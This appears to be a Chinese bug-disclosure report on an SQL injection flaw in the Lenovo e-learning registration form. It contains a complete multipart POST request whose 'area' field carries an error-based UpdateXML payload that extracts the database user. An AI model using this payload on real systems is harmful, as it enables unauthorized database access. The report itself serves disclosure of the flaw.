http://e-learning.lenovo.com.cn
登陆的时候选择
联想员工注册
继续选择
零售业务同事注册
随便填,然后就直接注册就可以了
报错
截取部分代码
通过分析我们知道,post获取的area直接insert进入数据库导致sql注入漏洞,如下:
POST http://e-learning.lenovo.com.cn/itcode/ls HTTP/1.1
------WebKitFormBoundarySlOvhQpJK5p4oKJc
Content-Disposition: form-data; name="realname"
obama3
------WebKitFormBoundarySlOvhQpJK5p4oKJc
Content-Disposition: form-data; name="email"
obama3
------WebKitFormBoundarySlOvhQpJK5p4oKJc
Content-Disposition: form-data; name="area"
' | UpdateXML(1,CONCAT(0x5b,mid((SELECT user()),1,32),0x5d),1))#
------WebKitFormBoundarySlOvhQpJK5p4oKJc
Content-Disposition: form-data; name="yt0"
注å
------WebKitFormBoundarySlOvhQpJK5p4oKJc--
返回
数据库用户:[email protected]
见漏洞证明